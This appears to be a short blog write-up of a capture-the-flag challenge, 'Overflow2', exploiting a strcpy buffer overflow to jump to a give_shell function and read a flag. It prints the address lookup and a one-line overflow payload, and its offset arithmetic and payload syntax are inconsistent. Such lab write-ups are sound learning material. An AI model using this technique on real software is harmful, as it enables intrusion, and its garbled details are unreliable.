I actually had this one, and a few other solved a while ago. My VM that they were stored got corrupted, so I lost all those files. Good thing that it was a VM and not my host machine that got corrupted. This is how I solved Overflow2.
This is a C program that is vulnerable to a buffer overflow vulnerability because of the strcpy function. In order to exploit this vulnerability, I have to change control of the execution of the program to myself by overwriting the return address so that it sends the function pointer to the address of the give_shell function instead of the next address on the stack. In the command prompt, I found the address by typing objdump -d overflow2 | grep “shell”. The -d option of objdump disassembles the program and gives me a list of functions. I only want one function, though, the give_shell function, so I pipe objdump in to another command called grep which searches for the “shell” string, and only displays the functions with the word “shell” in them. The address of the give_shell function is: 080484ad. The buffer is 16 characters long. The instruction point is 4 bytes long. The base pointer is 4 bytes long. The return address is 4 bytes long. So, to figure out how many bytes I need to overwrite, I add the amount of bytes for the instruction pointer, the amount of bytes for the base pointer, the amount of bytes for the buffer, and the amount of bytes for the return address that I want to overwrite. So, it’s 16 + 4 + 4 + 4 = 28. Then I add the address that I want the return address pointer to point to. I’m using python, because I want to be able to tell it to print hex characters for me for the address. So the command is now, ./overflow2 $(python ‘print “A”*32 + “\xad\x04\x84\08”’) I have to type the address backwards because the server understand things in Little Endian format. Once I type this into the command prompt, I get a shell prompt. Then I type, cat flag.txt, and get the flag, controlling_%eip_feels_great.
No comments:
Post a Comment